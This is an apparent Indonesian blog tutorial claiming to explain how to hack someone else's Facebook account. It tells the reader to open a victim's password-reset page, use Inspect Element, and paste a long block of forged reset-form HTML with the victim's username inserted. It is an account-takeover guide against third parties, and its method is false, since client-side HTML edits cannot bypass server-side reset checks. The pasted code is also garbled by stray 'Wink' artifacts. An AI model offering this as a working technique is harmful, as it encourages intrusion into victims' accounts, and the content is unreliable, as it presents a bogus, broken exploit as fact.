Cara Hack FB menggunakan Kode HTML
Cara Hack FB menggunakan Kode HTML - Merupakan langkah baru untuk hacking facebook dengan manfaatkan kode HTML. Gunakan laptop atau computer kamu pastikan telah terinstall google chrome atau mozilla firefox sehingga kamu mampu manfaatkan fitur inspect element ini yang merupakan syarat untuk melaksanakan tehnik hacking facebook teranyar bersama sedikit koding HTML.
Cara Hack Fb bersama script HTML
Langsung saja, selanjutnya bagian by bagian hack facebook yang kita rangkum sesingkat mungkin:
1. Login ke akun facebook anda.
2. Cari dan simpan username korban/ obyek yang mengidamkan di hack.
3. Logout dari facebook, lalu terhadap halaman login/ login page menentukan pilihan lupa password.
4. Pada halaman cari akun, input username korban lalu tap Search, facebook dapat mencari akun yang sesuai sesuai username yang di inputkan.
5. Pada halaman reset password facebook ini, klik tombol kanan terhadap mouse (touchpad) lalu menentukan Inspect Element.
6. Saat Inspect Element keluar tap Edit Html lalu copy pastekan kode html di bawah ini,
<form method="post" action="/recover/password?u=(VICTIM USERNAME)&n=389548" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)" id="u_0_4"><input type="hidden" name="lsd" value="AVoH0gpvlk4" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Choose a new password</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">A strong password is a combination of letters plus punctuation marks. It must be at least 6 characters long.</div><table class="uiInfoTable" role="presentation"><tbody><tr class="dataRow"><th class="label"><label for="password_new">New Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off"><label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label><div id="password_new_status"></div></td></tr><tr class="dataRow"><th class="label"><label for="password_confirm">Confirm Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off"><div id="password_confirm_status"></div></td></tr></tbody></table><div class="mvl"><div class="mvm">To make sure your account's secure, we can log you out of any other computers plus phones. You can log back in with your new password.</div><div class="mvm"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" checked="1" name="reason" value="kill_sessions" onclick="CSS.hide(ge("chpw_survey_hacked_warn"Wink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_1"><label for="u_0_1" class="uiInputLabelLabel">Log me out of other devices</label></div><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" name="reason" value="keep_sessions" onclick=""chpw_survey_hacked_warn"Wink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_2"><label for="u_0_2" class="uiInputLabelLabel">Keep me logged in</label></div></div><div class="mtm hidden_elem" id="chpw_survey_hacked_warn" style="color:red;">If your akun was hacked, please select "Log me out of other devices"</div></div></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_3"><input value="Continue" name="btn_continue" type="submit" id="u_0_3"></label><a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a></div><div class="pts"></div></div></div></div></form>
7. Setelah copy paste, lalu tekan enter maka otomatis facebook dapat mengkonfirmasi kamu untuk memasukkan kata sandi facebook baru, thats it.
Begitulah langkah script hack facebook lewat html kode html facebook, terimakasih telah membaca dan jangan lupa baca tutorial hack fb kita yang lainnya.
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